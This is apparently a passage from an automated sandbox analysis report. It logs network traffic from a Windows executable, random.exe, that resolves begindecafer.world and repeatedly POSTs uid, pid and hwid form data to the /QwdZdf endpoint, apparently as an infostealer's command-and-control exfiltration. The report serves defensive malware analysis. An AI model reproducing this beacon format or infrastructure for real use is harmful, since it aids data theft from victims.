                                                              Mar 7, 2025 20:07:40.045001984 CET44349692188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:40.045027018 CET49692443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:40.045044899 CET49692443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:40.045068979 CET44349692188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:40.045191050 CET49692443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:40.045228004 CET49692443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:40.045236111 CET44349692188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:40.045255899 CET49692443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:40.045294046 CET44349692188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:42.702522039 CET44349692188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:42.702641010 CET44349692188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:42.702691078 CET49692443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:42.721693993 CET49692443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:42.721718073 CET44349692188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:43.132498980 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:43.132540941 CET44349693188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:43.132615089 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:43.132917881 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:43.132931948 CET44349693188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:45.725954056 CET44349693188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:45.726106882 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:45.814944983 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:45.814966917 CET44349693188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:45.815334082 CET44349693188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:45.816580057 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:45.816608906 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:45.816668987 CET44349693188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:46.745480061 CET44349693188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:46.745659113 CET44349693188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:46.745731115 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:46.769627094 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:46.769661903 CET44349693188.114.97.3192.168.2.6
                                                              Mar 7, 2025 20:07:46.769675970 CET49693443192.168.2.6188.114.97.3
                                                              Mar 7, 2025 20:07:46.769685030 CET44349693188.114.97.3192.168.2.6

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 7, 2025 20:07:21.452409029 CET6434853192.168.2.61.1.1.1
                                                              Mar 7, 2025 20:07:21.467807055 CET53643481.1.1.1192.168.2.6

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Mar 7, 2025 20:07:21.452409029 CET192.168.2.61.1.1.10x337cStandard query (0)begindecafer.worldA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Mar 7, 2025 20:07:21.467807055 CET1.1.1.1192.168.2.60x337cNo error (0)begindecafer.world188.114.97.3A (IP address)IN (0x0001)false
                                                              Mar 7, 2025 20:07:21.467807055 CET1.1.1.1192.168.2.60x337cNo error (0)begindecafer.world188.114.96.3A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • begindecafer.world

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.649685188.114.97.34436660C:\Users\user\Desktop\random.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-07 19:07:23 UTC269OUTPOST /QwdZdf HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 65
                                                              Host: begindecafer.world
                                                              2025-03-07 19:07:23 UTC65OUTData Raw: 75 69 64 3d 65 64 32 38 32 64 65 32 34 39 32 65 35 31 35 62 35 61 36 30 30 66 37 64 39 39 39 33 64 38 38 61 31 61 34 62 64 36 63 61 33 37 64 63 32 32 39 37 61 32 61 39 31 35 31 38 26 63 69 64 3d
                                                              Data Ascii: uid=ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518&cid=
                                                              2025-03-07 19:07:24 UTC786INHTTP/1.1 200 OK
                                                              Date: Fri, 07 Mar 2025 19:07:24 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 14134
                                                              Connection: close
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7S6XsZsF78A5lW5C2qYPpKdtydQUpz7wmnPN60i44iin7JuILXuFVAN2E6nlM3MKcdhWWeTdTVFn8ytBsc10Sb9%2BUo%2F2mOpM4eI4n0rVQQB1E56592GDvTlbxJbNFpkmi0KC5Vo%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 91cc6021eb4186a6-IAD
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=27575&min_rtt=27264&rtt_var=10847&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=970&delivery_rate=97318&cwnd=68&unsent_bytes=0&cid=733881f483a1e72b&ts=1447&x=0"
                                                              2025-03-07 19:07:24 UTC583INData Raw: 2c 32 ae 87 f2 23 4d d4 fe 5f f6 0a 8b 52 47 4f 0a 5b 81 9b e5 43 5e c9 67 70 bc 16 2e 16 ac 90 d0 41 3a de ff 39 b0 5a cf f7 7f a1 04 05 40 f4 e3 2a 21 8d 64 53 a1 5c e8 59 8d fb db 72 6a ee 20 e5 6b 35 06 4a 5f 9c e5 33 8c 84 e6 da 85 41 8d c0 7f 1c f6 23 f8 ce 32 7a 5b de 72 d6 0d bd 77 3b 98 63 bd 4f 30 04 4a 5e 83 da e9 10 d3 4c 3b fa 6f 05 a7 74 8f 08 f9 8e 14 4f ee 37 81 06 a4 76 f3 fd 82 48 37 a7 ee ba 93 00 33 79 c9 64 36 ac e7 67 f7 22 83 d2 aa 65 74 69 76 09 b5 82 80 0b 5f 6b 18 a5 48 46 a1 78 86 2e 5b ed 77 39 c3 32 fb b6 c8 e7 fe 2b e2 aa b0 86 90 4a 91 5f ab 8c 8f 42 b1 b3 cd c6 dc f3 8d 6e 4a d2 2f 69 d8 e5 30 61 36 c7 c2 ac 8b 04 cf 26 ff 7a 8f cd 25 ce c2 7f 08 9d f7 d0 06 75 99 c3 12 e8 2c 2e bb 96 02 d4 28 12 5b 38 10 54 85 6b d7 d4 18
                                                              Data Ascii: ,2#M_RGO[C^gp.A:9Z@*!dS\Yrj k5J_3A#2z[rw;cO0J^L;otO7vH73yd6g"etiv_kHFx.[w92+J_BnJ/i0a6&z%u,.([8Tk
                                                              2025-03-07 19:07:24 UTC1369INData Raw: 55 27 ec cb cb ac 91 d7 de f6 88 9b b9 18 d1 b7 b5 b4 b5 a3 d1 80 91 3b 67 a0 0e e7 c2 5a af b5 21 9c 68 21 21 4a 77 80 0b d1 22 60 8f 8b 06 0f e5 cf b3 4f 96 45 77 e5 35 b9 31 1c 77 2d 28 5e fc 04 06 2b 82 db 62 0c 3f 63 0e b8 ee 07 20 a2 27 5e 37 f3 82 6f 4b da c1 af 50 3a 60 2a dd c6 68 c7 bc d7 c0 a4 df 6e 1a 40 ce db ea 87 52 5b 3f a9 39 23 44 90 0b 9b 83 3c 3d 97 e2 8f 10 ee 88 84 b7 35 b5 90 bc f9 6d f9 49 28 94 20 d4 05 a6 c7 a5 5d 5d 06 50 a2 f2 0c 09 4b 35 5c dc 3b ad 23 cd 6e d8 f0 0b cf f9 34 05 3a 44 46 f2 5b b2 2a 94 94 00 15 07 2b 7b db 74 23 c6 61 fe 4c 7b 02 13 be a7 92 36 d7 fd 13 45 6b 11 9d 2d 31 db 96 f8 e2 b2 df 18 25 04 8d 16 9a 2d e3 cd ad 15 97 31 56 47 ef c8 14 be be d6 bb 92 8e ec b1 6e c8 cc f4 5e c3 2b af ec d7 9b 4d 57 21 12
                                                              Data Ascii: U';gZ!h!!Jw"`OEw51w-(^+b?c '^7oKP:`*hn@R[?9#D<=5mI( ]]PK5\;#n4:DF[*+{t#aL{6Ek-1%-1VGn^+MW!
                                                              2025-03-07 19:07:24 UTC1369INData Raw: 1e 0f a7 b8 f7 d6 cc ce d2 b3 8d 65 0a bc 61 7d 4f 34 fc b4 19 7a 30 f3 e2 ca ba 5a 8e ab 05 62 36 82 f7 5a 35 9d f4 1b f3 80 ec 95 b6 a6 2c d8 64 b8 77 e8 e2 d3 87 fb 70 e7 10 b8 83 7c f8 ad d7 11 f0 42 46 0a 4c e3 d0 0b 7b fc c8 3f f0 72 77 3f 13 a2 1c 08 e7 8d ec 60 9a 88 5a 5d 37 d9 48 7a fa c2 94 37 72 c2 19 89 3e fd d8 a6 4a 20 34 ca fe bb d8 49 54 d6 7d 79 a1 e3 55 61 fc af 4f 29 85 94 14 33 4c f0 40 27 db 9d a7 17 bf f3 6d 76 4c 6d 6e 34 fa 1a 50 e5 b6 c5 60 57 c0 03 6e 39 da ba 38 84 f3 f8 d0 cf b6 9c 50 37 8a 32 81 a5 ef d1 bf af f8 f1 d4 bf e1 2e f7 6a 16 12 a3 ef 8d f8 f8 9b 63 8d 7f f3 fd 9b 04 35 36 0a 06 c3 16 fd 9e 21 7e 9d af 39 d7 4e 96 ba a6 02 11 42 71 d0 96 bd 6f 08 51 35 9c 4f fc 53 86 3b 5f e4 f7 49 88 dd 7e 10 bd 21 8b 6e 86 ad ca
                                                              Data Ascii: ea}O4z0Zb6Z5,dwp|BFL{?rw?`Z]7Hz7r>J 4IT}yUaO)3L@'mvLmn4P`Wn98P72.jc56!~9NBqoQ5OS;_I~!n
                                                              2025-03-07 19:07:24 UTC1369INData Raw: d4 3e 66 e4 54 2b f2 ef 78 f7 3f ac 0b 20 7d 6a 15 99 33 e6 5e 57 0c b3 f6 26 be 59 fe 69 25 14 9a 5c 48 43 95 3f 9a 74 65 3c 73 32 c5 88 99 19 5f f4 ea d9 4f 86 8d e1 f9 22 6d b8 cb ab c3 75 e8 37 33 cf 61 d3 17 62 0c 77 aa 65 39 4b 02 5c 50 89 e1 fe 02 37 40 7f 91 cd df 4a 77 6f 85 8f d4 5d 9a d7 98 b3 76 3c 4a 4f c6 91 df a5 b8 e4 b7 e3 f1 23 ac f0 92 3a 74 9d 23 fe db dc 3a 1c 15 dd 49 d3 0b aa ff e4 f9 7a 13 73 1d a7 43 06 81 84 50 c9 64 36 17 35 ee 20 44 16 fe ca 45 71 b6 d4 94 6b 1b 80 76 b5 37 ea 6b ab 6d 8f 2a 7b 16 41 28 c8 12 73 44 36 e5 8f 82 95 c4 37 c1 4a 5a 63 89 73 24 92 44 eb cd f2 ba 71 3e f4 2f 6d 06 86 6d f0 cf 87 93 e7 11 fc e5 03 f1 4f 34 18 96 44 97 eb 78 c0 10 93 ba 8a 79 49 14 c8 9c e5 71 b3 cc 6a 8a eb ef ea a1 be 7f 56 9e bb 2e
                                                              Data Ascii: >fT+x? }j3^W&Yi%\HC?te<s2_O"mu73abwe9K\P7@Jwo]v<JO#:t#:IzsCPd65 DEqkv7km*{A(sD67JZcs$Dq>/mmO4DxyIqjV.
                                                              2025-03-07 19:07:24 UTC1369INData Raw: 3d 6e dd f6 b1 ae f9 43 d8 34 a7 57 ca 5a 76 ba 36 36 71 30 2a 64 ed 0a 5a 29 10 94 a3 0e 11 e0 28 d0 6b b4 aa 92 74 82 08 b8 7b be 2d bf bb 47 0f 04 43 b2 ee ac 4c 3b 80 f3 7c ff 13 6a b9 16 bf 76 f1 5b f8 55 42 41 71 62 61 9f b0 d3 97 9e 48 33 50 cb 86 a7 69 93 1e af 61 82 de d0 e3 71 6b c2 5b 44 aa e4 0f 89 7c aa 13 2f 55 1a b9 43 fb 88 45 aa df d3 fd 1c 08 e5 d2 9f bd 78 a0 b1 7d 0c ba d2 e4 06 48 81 33 7c fc 5f 83 9d b7 2f 31 27 5e a1 e1 04 21 b5 dd 92 dc 4b 76 18 b7 1f 03 02 01 5b d9 8d 5a e0 07 18 30 20 cb 7a 7c 8a f5 bc a4 9c 09 1c 4b 25 60 de 24 af fe 9e df ee 3e 5a fa 5f 6b 79 54 45 1f 04 86 a9 71 d9 cd de 68 f8 11 eb 42 36 2a ab 50 4e 02 2d 0f 82 05 59 98 dd 11 f3 81 36 8b 9e 30 cc 48 f4 b5 f3 59 8d 6d 16 a1 74 6c 98 fd fd e5 b3 c8 07 fd 05 12
                                                              Data Ascii: =nC4WZv66q0*dZ)(kt{-GCL;|jv[UBAqbaH3Piaqk[D|/UCEx}H3|_/1'^!Kv[Z0 z|K%`$>Z_kyTEqhB6*PN-Y60HYmtl
                                                              2025-03-07 19:07:24 UTC1369INData Raw: bc 2d 3f 3f 99 ba a7 0f ee a5 b2 0a 2c 91 0d 40 46 14 71 84 b3 19 b5 c5 70 70 61 a9 38 58 c5 df 94 0a 7b 42 09 17 96 ba 64 da 42 db 18 09 c4 ec 66 8d 8f 52 f8 d4 3f 5c 50 5e 84 d3 a5 6c 73 fb ba 2b db 52 a5 bb fe 5a ce fe 3d 50 22 52 bc ea 9d f5 49 e7 a0 29 3c 75 12 ff e9 ee ac c8 fa d6 42 93 c4 9b 09 8a 36 06 8c ec b7 80 a2 a5 59 ac 2b 74 55 43 de e3 a8 6c ea 55 4a 65 05 fa 6b a8 a6 ee 9a ee 0a fb ab e0 b9 1d 19 66 24 05 fc 67 12 e1 c1 89 d7 44 72 d1 8b 55 9d 71 c0 e4 df 37 74 eb 2c 31 13 12 22 50 bf 05 71 5d d7 3f 0f d5 ae 91 e0 4f 9b 04 aa d2 2d 7f 1b 77 36 9a 68 8f 22 38 ba df 56 2e 60 35 1e 3e 44 05 52 df 58 7c a6 72 7c 94 89 d7 de ec 22 89 ec b5 b3 43 77 e5 55 dd 87 fc 42 5a 53 be 94 43 67 d1 00 f4 e1 a9 ab ea 41 b5 a9 29 c2 6f 95 9b 02 e0 8a c7 54
                                                              Data Ascii: -??,@Fqppa8X{BdBfR?\P^ls+RZ=P"RI)<uB6Y+tUClUJekf$gDrUq7t,1"Pq]?O-w6h"8V.`5>DRX|r|"CwUBZSCgA)oT
                                                              2025-03-07 19:07:24 UTC1369INData Raw: 2c 19 a4 17 be 5a 8f e0 85 81 dc 3d 03 8d ed 54 5a ac 2f 0b 8b fc 2d e8 d5 56 96 0a ae e1 1b 8e e8 c3 c0 e8 5c 21 80 72 5e d6 4e 10 23 1e 12 68 a9 b9 55 08 e5 06 65 33 19 57 a8 b4 a9 5e 05 ea 28 ce 70 3f a8 0e 84 87 15 d5 23 99 95 98 ff fd 7e a2 1f 55 b9 74 cb 60 ea 70 ca f7 aa 0e 2b d8 05 25 46 c7 c7 dd 51 10 09 0d 19 56 55 ed 77 97 81 6a df 40 e4 2b a9 bc 1a 68 a4 95 09 d1 43 8f e3 b6 60 67 61 01 b4 2e ce 8f cb 37 32 56 39 c5 52 83 80 14 72 ab 32 51 c2 e4 85 71 81 2a 1f 9a f4 96 62 ab 1e 7f 9b e1 f5 75 4f 39 6e b8 64 cd a1 14 a6 a9 3e 67 31 70 c5 5e e9 71 c0 cb 36 37 9d 50 eb fd 31 5c 31 63 af f0 36 e4 a2 4c 3c c5 d5 37 53 3a 93 0f 67 58 2f d7 94 c5 32 57 48 23 22 e2 01 34 4d 63 a9 64 23 6d 4d ef 7b 15 20 47 d2 98 58 5c 0f ec 61 c7 e3 cb f4 b1 5e f4 8f
                                                              Data Ascii: ,Z=TZ/-V\!r^N#hUe3W^(p?#~Ut`p+%FQVUwj@+hC`ga.72V9Rr2Qq*buO9nd>g1p^q67P1\1c6L<7S:gX/2WH#"4Mcd#mM{ GX\a^
                                                              2025-03-07 19:07:24 UTC1369INData Raw: 4c 7c 79 58 6e 3a f8 59 dc 08 25 e7 bd 52 86 d9 99 65 57 42 64 81 df ac fb ff 3c 97 08 78 c6 b8 04 5a 41 5a 41 53 7d 2e 6d 6e 86 a6 70 53 89 4f f8 5f ef c0 a9 1c 83 56 f3 a3 c5 d8 0d 7d 4b da 86 8b 16 47 5c 2f d5 24 1c 8f da 50 f6 c7 b5 81 82 f5 4e 39 16 6b f5 b2 e4 c0 3f 14 2f 9f 41 c5 06 b4 fb 7e d3 fa f4 7e dd 63 32 78 af f2 f9 cb 47 4b 82 59 ae 1c 7f c5 54 65 ac 1c c3 94 7e cf 19 4d a9 45 53 7f 36 30 a9 7e 69 d7 6a cf 06 61 86 32 25 90 28 f1 ce 79 25 c0 6a 8b 48 44 72 04 18 46 01 a5 98 13 0c 98 29 65 b3 a3 3f a7 00 6b 89 4e 30 bf f2 74 03 ec d9 ae d4 df 78 62 d4 51 59 cf 13 61 5c 5c c8 5f 79 88 5d 7b dc 03 cb 0f ed e6 d6 b5 8b 11 76 32 42 98 43 23 bd 49 c3 d1 26 5f 1a 0b a8 0f fc 8c 75 73 ae 96 56 1c a3 ff cb 4e b6 aa 56 8c 18 ae 74 96 34 75 47 a3 1d
                                                              Data Ascii: L|yXn:Y%ReWBd<xZAZAS}.mnpSO_V}KG\/$PN9k?/A~~c2xGKYTe~MES60~ija2%(y%jHDrF)e?kN0txbQYa\\_y]{v2BC#I&_usVNVt4uG
                                                              2025-03-07 19:07:24 UTC1369INData Raw: 95 ba 16 94 e5 25 0e 0c 5f 7e b2 02 1a e2 e7 86 43 f4 2d fb f6 52 6f 3f c5 fb 1d af 6a 21 c5 34 5d 61 b4 7b bf fd 4b 04 0a 53 65 4a 19 d9 e6 19 3d f1 23 20 8f 0b 61 9a 0e 19 8c 05 b2 0b 08 22 4a 87 b5 64 e9 38 af e6 94 25 0d 72 ee ad b5 aa 7e 5d 92 6d 48 ed 9d 62 04 1d 62 f9 51 aa 8e 9e bc 6e b9 1d 91 af a6 90 60 58 15 e9 ec c5 eb 40 78 a8 d6 25 d9 2b db 99 e9 d4 8e 86 55 f1 0a d7 d1 1c bd f4 c1 23 d2 0b 16 de 21 b4 c0 a6 da 66 30 78 93 63 4e 1a ad 8f 06 ac c0 b6 cc 4f 0c cd e1 5e e9 a6 7b 6f f1 e6 e5 d6 a8 3e 0e 27 85 89 83 d1 69 b2 78 84 01 c9 42 08 8a 13 f8 3c 39 eb d7 a4 95 38 50 e1 bb 70 62 b7 79 dd 2f 4f 90 06 f0 b1 09 10 53 69 88 c0 f5 4b 89 15 84 81 87 e7 50 54 10 c7 c9 0f 13 c3 02 63 03 29 c9 49 f7 ee 1e 9a 47 08 aa 75 19 3d c2 50 d6 f4 ec 05 41
                                                              Data Ascii: %_~C-Ro?j!4]a{KSeJ=# a"Jd8%r~]mHbbQn`X@x%+U#!f0xcNO^{o>'ixB<98Ppby/OSiKPTc)IGu=PA


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.649688188.114.97.34436660C:\Users\user\Desktop\random.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-07 19:07:26 UTC279OUTPOST /QwdZdf HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=X3wZQoOqj0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 14893
                                                              Host: begindecafer.world
                                                              2025-03-07 19:07:26 UTC14893OUTData Raw: 2d 2d 58 33 77 5a 51 6f 4f 71 6a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 64 32 38 32 64 65 32 34 39 32 65 35 31 35 62 35 61 36 30 30 66 37 64 39 39 39 33 64 38 38 61 31 61 34 62 64 36 63 61 33 37 64 63 32 32 39 37 61 32 61 39 31 35 31 38 0d 0a 2d 2d 58 33 77 5a 51 6f 4f 71 6a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 33 77 5a 51 6f 4f 71 6a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 42 33 32 44 43 43 36 33 42 34 41
                                                              Data Ascii: --X3wZQoOqj0Content-Disposition: form-data; name="uid"ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518--X3wZQoOqj0Content-Disposition: form-data; name="pid"2--X3wZQoOqj0Content-Disposition: form-data; name="hwid"8EB32DCC63B4A
                                                              2025-03-07 19:07:28 UTC825INHTTP/1.1 200 OK
                                                              Date: Fri, 07 Mar 2025 19:07:27 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FkeaLsmAhUmuB3onlbEcTDDo4smRnvW%2Fr1jCgNBAeY28Z1u1o82VbsXJuh7a%2BjM4QpqzXGhcc5aRb%2FpaoTWbRAMdAWfPDnioEk5L8Zm3IE3ECt%2Fkkd5LOKNZEJpMnnWvHx6weo%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 91cc60360dad801b-IAD
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=36520&min_rtt=29856&rtt_var=15956&sent=13&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15830&delivery_rate=96998&cwnd=128&unsent_bytes=0&cid=bc990ce162652503&ts=1114&x=0"
                                                              2025-03-07 19:07:28 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 32 34 2e 32 34 36 2e 32 33 38 2e 31 37 37 22 7d 7d 0d 0a
                                                              Data Ascii: 46{"success":{"message":"message success delivery from 24.246.238.177"}}
                                                              2025-03-07 19:07:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.649689188.114.97.34436660C:\Users\user\Desktop\random.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-07 19:07:29 UTC281OUTPOST /QwdZdf HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=XIe0Fqie39i1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 15084
                                                              Host: begindecafer.world
                                                              2025-03-07 19:07:29 UTC15084OUTData Raw: 2d 2d 58 49 65 30 46 71 69 65 33 39 69 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 64 32 38 32 64 65 32 34 39 32 65 35 31 35 62 35 61 36 30 30 66 37 64 39 39 39 33 64 38 38 61 31 61 34 62 64 36 63 61 33 37 64 63 32 32 39 37 61 32 61 39 31 35 31 38 0d 0a 2d 2d 58 49 65 30 46 71 69 65 33 39 69 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 49 65 30 46 71 69 65 33 39 69 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 42 33 32 44 43
                                                              Data Ascii: --XIe0Fqie39i1Content-Disposition: form-data; name="uid"ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518--XIe0Fqie39i1Content-Disposition: form-data; name="pid"2--XIe0Fqie39i1Content-Disposition: form-data; name="hwid"8EB32DC
                                                              2025-03-07 19:07:30 UTC829INHTTP/1.1 200 OK
                                                              Date: Fri, 07 Mar 2025 19:07:30 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyobRjqUSKiralle90qZ%2BmlXqOG6tAReyqg6a8SQtOk%2Flv%2BZU6Jwo%2F1DMhYF3mkxloCnxMNbxyUtqtDrmHgwklK%2BNTdI0NQ02WJC4TRk7XzbpMe7JWehfEKfWa6%2BusQsoL%2FE69w%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 91cc60495d62c968-IAD
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=36075&min_rtt=34853&rtt_var=15515&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16023&delivery_rate=64880&cwnd=228&unsent_bytes=0&cid=85f61f3333f5da4f&ts=1065&x=0"
                                                              2025-03-07 19:07:30 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 32 34 2e 32 34 36 2e 32 33 38 2e 31 37 37 22 7d 7d 0d 0a
                                                              Data Ascii: 46{"success":{"message":"message success delivery from 24.246.238.177"}}
                                                              2025-03-07 19:07:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.649690188.114.97.34436660C:\Users\user\Desktop\random.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-03-07 19:07:33 UTC279OUTPOST /QwdZdf HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=6Zc0vSHm43
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 19931
                                                              Host: begindecafer.world
                                                              2025-03-07 19:07:33 UTC15331OUTData Raw: 2d 2d 36 5a 63 30 76 53 48 6d 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 64 32 38 32 64 65 32 34 39 32 65 35 31 35 62 35 61 36 30 30 66 37 64 39 39 39 33 64 38 38 61 31 61 34 62 64 36 63 61 33 37 64 63 32 32 39 37 61 32 61 39 31 35 31 38 0d 0a 2d 2d 36 5a 63 30 76 53 48 6d 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 5a 63 30 76 53 48 6d 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 42 33 32 44 43 43 36 33 42 34 41
                                                              Data Ascii: --6Zc0vSHm43Content-Disposition: form-data; name="uid"ed282de2492e515b5a600f7d9993d88a1a4bd6ca37dc2297a2a91518--6Zc0vSHm43Content-Disposition: form-data; name="pid"3--6Zc0vSHm43Content-Disposition: form-data; name="hwid"8EB32DCC63B4A
